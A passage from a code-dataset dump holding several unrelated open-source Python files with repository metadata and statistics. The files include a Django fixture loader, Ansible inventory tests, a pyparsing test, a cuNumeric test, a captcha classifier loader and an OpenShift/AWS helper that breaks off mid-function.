] | 31.416667 | 53 | 0.71618 | 44 | 377 | 6.113636 | 0.590909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009119 | 0.127321 | 377 | 12 | 54 | 31.416667 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.10582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3949804a27d13ac40bfeeab53fe441faa29640de | 2,900 | py | Python | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 796 | 2019-10-19T19:58:12.000Z | 2022-03-22T14:02:37.000Z | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 224 | 2019-10-19T17:45:12.000Z | 2022-03-24T20:46:29.000Z | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 33 | 2019-10-22T21:17:09.000Z | 2021-12-23T06:08:26.000Z | from datetime import timedelta
from django.core.management.base import BaseCommand
from django.utils import timezone
from audits.factories import (
AuditFactory,
AuditResultsFactory,
AuditStatusHistoryFactory,
)
from audits.models import Audit, AuditResults
from core.factories import AdminFactory, UserFactory
from projects.factories import (
PageFactory,
ProjectAuditParametersFactory,
ProjectFactory,
ProjectMemberRoleFactory,
)
from projects.models import NetworkShapeOptions
class Command(BaseCommand):
help = "Load a set of fixtures"
def handle(self, *args, **options):
# Creates an admin with the credentials `admin // admin`
admin = AdminFactory()
user = UserFactory()
# Creates a first project with admin as an admin
project = ProjectFactory()
ProjectMemberRoleFactory(user=admin, project=project)
ProjectMemberRoleFactory(user=user, project=project, is_admin=False)
parameters_project = ProjectAuditParametersFactory(project=project)
parameters2_project = ProjectAuditParametersFactory(
project=project,
name="Dulles | Chrome | 3G",
network_shape=NetworkShapeOptions.THREE_G.name,
)
page = PageFactory(project=project)
page2 = PageFactory(project=project, name="Docs")
# Creates a month worth of audits, with history and results
for day in range(0, 30):
audit = AuditFactory(parameters=parameters_project, page=page)
timestamp = timezone.now() - timedelta(days=day)
Audit.objects.filter(pk=audit.pk).update(created_at=timestamp)
AuditStatusHistoryFactory(audit=audit)
results = AuditResultsFactory(audit=audit)
AuditResults.objects.filter(pk=results.pk).update(created_at=timestamp)
audit2 = AuditFactory(parameters=parameters2_project, page=page)
Audit.objects.filter(pk=audit2.pk).update(created_at=timestamp)
AuditStatusHistoryFactory(audit=audit2)
results2 = AuditResultsFactory(audit=audit2)
AuditResults.objects.filter(pk=results2.pk).update(created_at=timestamp)
audit3 = AuditFactory(parameters=parameters_project, page=page2)
Audit.objects.filter(pk=audit3.pk).update(created_at=timestamp)
AuditStatusHistoryFactory(audit=audit3)
results3 = AuditResultsFactory(audit=audit3)
AuditResults.objects.filter(pk=results3.pk).update(created_at=timestamp)
audit4 = AuditFactory(parameters=parameters2_project, page=page2)
Audit.objects.filter(pk=audit4.pk).update(created_at=timestamp)
AuditStatusHistoryFactory(audit=audit4)
results4 = AuditResultsFactory(audit=audit4)
AuditResults.objects.filter(pk=results4.pk).update(created_at=timestamp)
| 42.647059 | 84 | 0.704483 | 286 | 2,900 | 7.083916 | 0.318182 | 0.051333 | 0.05923 | 0.067127 | 0.272458 | 0.146101 | 0.146101 | 0 | 0 | 0 | 0 | 0.012265 | 0.212759 | 2,900 | 67 | 85 | 43.283582 | 0.875164 | 0.054828 | 0 | 0 | 0 | 0 | 0.016807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.145455 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3949fe35326199497ec243fad616b2c474910cea | 409 | py | Python | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | """n = int(input("Enter ThE number :"))
temp = n
new = 0
while temp > 0:
d = temp % 10
new = new * 10 + d
temp = temp //10
if n == new:
print("Number is palindrome")
else:
print("Number is not palindrome")
#print(palindrome(101))
"""
var1=str(input("Enter the sequence"))
x=var1[::-1]
if(var1==x):
print("It is a Palindrome Number")
else:
print("It is not a Palindrome Number")
| 17.782609 | 42 | 0.599022 | 65 | 409 | 3.769231 | 0.4 | 0.081633 | 0.106122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 0.229829 | 409 | 22 | 43 | 18.590909 | 0.730159 | 0.608802 | 0 | 0 | 0 | 0 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394ae53df762a37668f92d5a8c275bd8a607f470 | 7,493 | py | Python | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | # Copyright 2015 Abhijit Menon-Sen <ams@2ndQuadrant.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
import textwrap
from ansible import constants as C
from ansible.compat.tests import mock
from ansible.compat.tests import unittest
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_text
from units.mock.path import mock_unfrackpath_noop
from ansible.inventory.manager import InventoryManager, split_host_pattern
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],
'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])],
}
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class TestInventoryPlugins(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_variables_stringify(self):
values = ['string', 'no', 'No', 'false', 'FALSE', [], False, 0]
inventory_content = "host1 "
inventory_content += ' '.join(['var%s=%s' % (i, to_text(x)) for i, x in enumerate(values)])
inventory = self._get_inventory(inventory_content)
variables = inventory.get_host('host1').vars
for i in range(len(values)):
if isinstance(values[i], string_types):
self.assertIsInstance(variables['var%s' % i], string_types)
else:
self.assertIsInstance(variables['var%s' % i], type(values[i]))
@mock.patch('ansible.inventory.manager.unfrackpath', mock_unfrackpath_noop)
@mock.patch('os.path.exists', lambda x: True)
@mock.patch('os.access', lambda x, y: True)
def test_yaml_inventory(self, filename="test.yaml"):
inventory_content = {filename: textwrap.dedent("""\
---
all:
hosts:
test1:
test2:
""")}
C.INVENTORY_ENABLED = ['yaml']
fake_loader = DictDataLoader(inventory_content)
im = InventoryManager(loader=fake_loader, sources=filename)
self.assertTrue(im._inventory.hosts)
self.assertIn('test1', im._inventory.hosts)
self.assertIn('test2', im._inventory.hosts)
self.assertIn(im._inventory.get_host('test1'), im._inventory.groups['all'].hosts)
self.assertIn(im._inventory.get_host('test2'), im._inventory.groups['all'].hosts)
self.assertEqual(len(im._inventory.groups['all'].hosts), 2)
self.assertIn(im._inventory.get_host('test1'), im._inventory.groups['ungrouped'].hosts)
self.assertIn(im._inventory.get_host('test2'), im._inventory.groups['ungrouped'].hosts)
self.assertEqual(len(im._inventory.groups['ungrouped'].hosts), 2)
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)
| 36.730392 | 113 | 0.577472 | 962 | 7,493 | 4.366944 | 0.246362 | 0.009998 | 0.033325 | 0.046656 | 0.418234 | 0.310878 | 0.248274 | 0.195192 | 0.195192 | 0.166627 | 0 | 0.052632 | 0.244361 | 7,493 | 203 | 114 | 36.91133 | 0.689332 | 0.117309 | 0 | 0.201342 | 0 | 0.006711 | 0.197482 | 0.022296 | 0 | 0 | 0 | 0 | 0.161074 | 1 | 0.067114 | false | 0 | 0.073826 | 0 | 0.187919 | 0.006711 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394e6287c45dd4b169b78862df54b129511b5346 | 1,495 | py | Python | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | import pyparsing as pp
def act_comment(token):
print("comment: " + str(token))
def act_keyword(token):
print("keyword: " + str(token))
def act_sc(token):
print("semicolon: " + str(token))
def act_parser_start(token):
print("parser_start: " + str(token))
def act_parser_end(token):
print("parser_end: " + str(token))
comment_parser = pp.Group(
(pp.Literal("//") + pp.restOfLine)
| pp.cStyleComment
).setParseAction(act_comment)
pp_key1 = pp.Keyword("hoge")
pp_key2 = pp.Keyword("fuga")
pp_sc = pp.Literal(";")
statement = pp.Group(
pp.Empty().setParseAction(act_parser_start)
+ pp_key1.setParseAction(act_keyword)
+ pp_key2.setParseAction(act_keyword)
+ pp_sc.setParseAction(act_sc)
+ pp.Empty().setParseAction(act_parser_end)
)
parser = statement[1, ...].ignore(comment_parser)
test_text = """\
hoge fuga; // comment1
hoge /* comment2-1 */ fuga; /* comment2-2 */
// comment3
hoge fuga; // comment4
"""
ret = parser.parseString(test_text)
print(ret)
"""
[result]
parser_start: []
keyword: ['hoge']
keyword: ['fuga']
semicolon: [';']
comment: [['//', ' comment1']]
parser_end: []
parser_start: []
keyword: ['hoge']
comment: [['/* comment2-1 */']]
keyword: ['fuga']
semicolon: [';']
comment: [['/* comment2-2 */']]
comment: [['//', ' comment3']]
parser_end: []
parser_start: []
keyword: ['hoge']
keyword: ['fuga']
semicolon: [';']
comment: [['//', ' comment4']]
parser_end: []
parser_start: []
[['hoge', 'fuga', ';'], ['hoge', 'fuga', ';'], ['hoge', 'fuga', ';']]
"""
| 19.166667 | 69 | 0.646154 | 181 | 1,495 | 5.149171 | 0.21547 | 0.082618 | 0.04721 | 0.060086 | 0.255365 | 0.148069 | 0.10515 | 0.10515 | 0 | 0 | 0 | 0.014548 | 0.126421 | 1,495 | 77 | 70 | 19.415584 | 0.699081 | 0 | 0 | 0 | 0 | 0 | 0.17449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147059 | false | 0 | 0.029412 | 0 | 0.176471 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394ecf34ca7686c2864f4d097b99dc46fa95d1e2 | 1,537 | py | Python | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 304 | 2021-11-05T13:13:08.000Z | 2022-03-27T17:53:37.000Z | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 62 | 2021-11-02T15:59:16.000Z | 2022-03-31T18:23:15.000Z | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 26 | 2021-11-09T09:01:04.000Z | 2022-02-25T15:57:22.000Z | # Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import cunumeric as num
def test():
a = num.array([[1, 2, 3, 4, 5, 6], [4, 5, 6, 7, 8, 9]], dtype=np.float64)
b = num.array(
[[10, 11], [12, 13], [14, 15], [16, 17], [18, 19], [20, 21]],
dtype=np.float64,
)
c = a.dot(b)
assert num.array_equal(c, [[350, 371], [620, 659]])
d = num.array([1, 2, 3, 4, 5, 6], dtype=np.float64)
e = num.array([1, 2, 3, 4, 5, 6], dtype=np.float64)
f = d.dot(e)
assert f == 91
# This test does not work ATM. It seems that setting random seed to
# be the same is not sufficient to make the inputs the same.
# num.random.seed(42)
# a = num.random.randn(1, 3, 15)
# b = num.random.randn(15, 16)
# c = a[0].dot(b)
# np.random.seed(42)
# an = np.random.randn(1, 3, 15)
# bn = np.random.randn(15, 16)
# cn = an[0].dot(bn)
# assert num.allclose(c, cn)
return
if __name__ == "__main__":
test()
| 27.945455 | 77 | 0.62069 | 260 | 1,537 | 3.634615 | 0.5 | 0.063492 | 0.012698 | 0.031746 | 0.10582 | 0.074074 | 0.074074 | 0.074074 | 0.059259 | 0.059259 | 0 | 0.088586 | 0.236174 | 1,537 | 54 | 78 | 28.462963 | 0.716354 | 0.58946 | 0 | 0 | 0 | 0 | 0.013223 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39514311e1de0c6b9b8fe2b0f0b8804f4d55eecd | 1,005 | py | Python | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | 1 | 2022-03-13T19:27:50.000Z | 2022-03-13T19:27:50.000Z | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | null | null | null | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | null | null | null | # Copyright (C) 2017 TU Dresden
# Licensed under the ISC license (see LICENSE.txt)
#
# Authors: Christian Menard
import logging
from hydra.utils import to_absolute_path
from .convert import convert
from .parse import parse
from mocasin.common.platform import Platform
log = logging.getLogger(__name__)
class MapsPlatform(Platform):
def __init__(self, name, xml_file, **kwargs):
super().__init__(
name,
symmetries_json=kwargs.get("symmetries_json", None),
embedding_json=kwargs.get("embedding_json", None),
)
log.info("start parsing the platform description")
xml_platform = parse(to_absolute_path(xml_file), True)
convert(
self,
xml_platform,
scheduler_cycles=kwargs.get("scheduler_cycles", None),
fd_frequencies=kwargs.get("fd_frequencies", None),
ppm_power=kwargs.get("ppm_power", None),
)
log.info("done parsing the platform description")
| 28.714286 | 66 | 0.664677 | 118 | 1,005 | 5.40678 | 0.483051 | 0.070533 | 0.043887 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005236 | 0.239801 | 1,005 | 34 | 67 | 29.558824 | 0.829843 | 0.103483 | 0 | 0 | 0 | 0 | 0.159598 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.217391 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3952324dfb1c3711021424481c4d89c71b0f8d7a | 2,020 | py | Python | autoelective/captcha/classifier.py | 12f23eddde/PKUAutoElective | 1a7094ea14a90fb23a3bd33d013bf5a46127394f | [
"MIT"
] | 24 | 2019-09-13T11:58:32.000Z | 2022-02-22T02:38:25.000Z | autoelective/captcha/classifier.py | yzy-pku/PKUAutoElective | 309f8472fc5ba751d46373ea51fa72e1aa3148b0 | [
"MIT"
] | 5 | 2020-09-21T16:23:20.000Z | 2022-01-13T01:37:13.000Z | autoelective/captcha/classifier.py | yzy-pku/PKUAutoElective | 309f8472fc5ba751d46373ea51fa72e1aa3148b0 | [
"MIT"
] | 5 | 2019-09-20T15:36:54.000Z | 2021-09-10T14:32:19.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# filename: classifier.py
# modified: 2019-09-08
__all__ = ["KNN","SVM","RandomForest"]
import os
import re
from sklearn.neighbors.classification import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble.forest import RandomForestClassifier
from sklearn.externals import joblib
from .feature import get_feature_extractor
from ..const import MODEL_DIR
from ..utils import Singleton
_regexModelFilename = re.compile(
pattern=(
r'^(?P<alg>\S+)\.model\.'
r'f(?P<feature>[1-5])\.'
r'(?:l(?P<level>\d{1})\.)*'
r'c(?P<compress>\d{1})'
r'(?P<ext>\.z|\.gz|\.bz2|\.xz|\.lzma)$'
),
flags=re.I,
)
def _get_MODEL_FILES():
model_files = {}
for file in os.listdir(MODEL_DIR):
res = _regexModelFilename.match(file)
if res is not None:
filename = res.group()
resDict = res.groupdict()
alg = resDict.pop("alg")
resDict["path"] = os.path.abspath(os.path.join(MODEL_DIR, filename))
model_files[alg] = resDict
return model_files
_MODEL_FILES = _get_MODEL_FILES()
class BaseClassifier(object, metaclass=Singleton):
ALG = ""
def __init__(self):
if self.__class__ is __class__:
raise NotImplementedError
clf, feature = self._load_model()
self._clf = clf
self.feature = feature
def _load_model(self):
alg = self.__class__.ALG
detail = _MODEL_FILES.get(alg)
path, fCode, lCode = map(detail.__getitem__, ("path","feature","level"))
feature = get_feature_extractor(fCode, lCode)
if path is None:
raise FileNotFoundError("model %s.* is missing" % alg)
return joblib.load(path), feature
def predict(self, Xlist):
return self._clf.predict(Xlist)
class RandomForest(BaseClassifier):
ALG = "RandomForest"
class KNN(BaseClassifier):
ALG = "KNN"
class SVM(BaseClassifier):
ALG = "SVM" | 24.047619 | 80 | 0.630198 | 247 | 2,020 | 4.94332 | 0.412955 | 0.05733 | 0.031122 | 0.03276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009721 | 0.236139 | 2,020 | 84 | 81 | 24.047619 | 0.781594 | 0.043564 | 0 | 0 | 0 | 0 | 0.105236 | 0.053396 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.160714 | 0.017857 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a31cbe01406213bfcaaf90c2882397642fc68d4 | 3,419 | py | Python | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 12 | 2016-04-01T10:59:14.000Z | 2022-01-27T04:05:43.000Z | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 16 | 2016-03-18T10:44:00.000Z | 2019-08-12T05:52:24.000Z | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 2 | 2016-09-08T11:49:39.000Z | 2020-09-09T04:39:15.000Z | # vim: set fenc=utf8 ts=4 sw=4 et :
import os
import io
import json
import unittest
from shlex import split
from .testcase import TestCase
from pdml2flow.conf import Conf
import pdml2flow
TEST_DIR_PDML2FLOW="test/pdml2flow_tests/"
TEST_DIR_PDML2FRAME="test/pdml2frame_tests/"
class TestSystem(TestCase):
def read_json(self, f):
objs = []
data = ''
for line in f:
data += line
try:
objs.append(json.loads(data))
data = ''
except ValueError:
# Not yet a complete JSON value
pass
return objs
def get_test(run, directory, test):
def system_test(self):
if os.path.isfile('{}/{}/skip'.format(directory, test)):
self.skipTest('Skipfile found')
with open('{}/{}/stdin'.format(directory, test)) as f_stdin, \
io.StringIO() as f_stdout, \
io.StringIO() as f_stderr:
# wire up io
Conf.IN = f_stdin
Conf.OUT = f_stdout
Conf.OUT_DEBUG = f_stderr
Conf.OUT_WARNING = f_stderr
Conf.OUT_ERROR = f_stderr
try:
# try to load arguments
with open('{}/{}/args'.format(directory, test)) as f:
Conf.ARGS = split(f.read())
except FileNotFoundError:
Conf.ARGS = ''
# run
run()
# compare stdout
stdout_raw = f_stdout.getvalue()
stderr_raw = f_stderr.getvalue()
with open('{}/{}/stdout'.format(directory, test)) as f:
expected_raw = f.read()
# Try parsing as json, and compare objects
run_objs = self.read_json(stdout_raw)
expected_objs = self.read_json(expected_raw)
self.assertEqual(
len(run_objs),
len(expected_objs)
)
for e in expected_objs:
self.assertIn(
e,
expected_objs
)
for o in run_objs:
self.assertIn(
o,
expected_objs
)
# if no object loaded: do a raw comparison, line by line
if len(run_objs) == 0 or len(expected_objs) == 0:
self.assertEqual(
sorted(
stdout_raw.splitlines()
),
sorted(
expected_raw.splitlines()
)
)
try:
# try compare stderr
with open('{}/{}/stderr'.format(directory, test)) as f:
expected_raw = f.read()
self.assertEqual(
expected_raw,
stderr_raw
)
except FileNotFoundError:
self.assertEqual(
'',
stderr_raw
)
return system_test
def add_tests(run, directory):
for test in os.listdir(directory):
# append test
setattr(
TestSystem,
'test_{}_{}'.format(run.__name__, test),
get_test(run, directory, test)
)
# Add tests
add_tests(pdml2flow.pdml2flow, TEST_DIR_PDML2FLOW)
add_tests(pdml2flow.pdml2frame, TEST_DIR_PDML2FRAME)
| 28.491667 | 71 | 0.488154 | 345 | 3,419 | 4.663768 | 0.295652 | 0.056557 | 0.059043 | 0.052206 | 0.10317 | 0.047234 | 0.047234 | 0.047234 | 0.047234 | 0 | 0 | 0.008656 | 0.425563 | 3,419 | 119 | 72 | 28.731092 | 0.810591 | 0.073706 | 0 | 0.230769 | 0 | 0 | 0.038669 | 0.013629 | 0 | 0 | 0 | 0 | 0.065934 | 1 | 0.043956 | false | 0.010989 | 0.087912 | 0 | 0.164835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a32119c70c0d1383a924bfd29be201dc7093bcb | 3,258 | py | Python | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | import time, datetime
print("Importing OpenShift/Kubernetes packages ...")
import kubernetes
import ocp_resources
import openshift
from ocp_resources.node import Node
from ocp_resources.machine import Machine
from ocp_resources.node import Node
from openshift.dynamic import DynamicClient
try:
client_k8s = DynamicClient(client=kubernetes.config.new_client_from_config())
except Exception:
client_k8s = None
print("WARNING: kubernetes not available.")
print("Importing AWS boto3 ...")
import boto3
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html
client_ec2 = boto3.client('ec2')
resource_ec2 = boto3.resource('ec2')
print("Ready.")
def wait_openshift():
first = True
print("Waiting for OpenShift cluster to be ready ...")
import urllib3
while True:
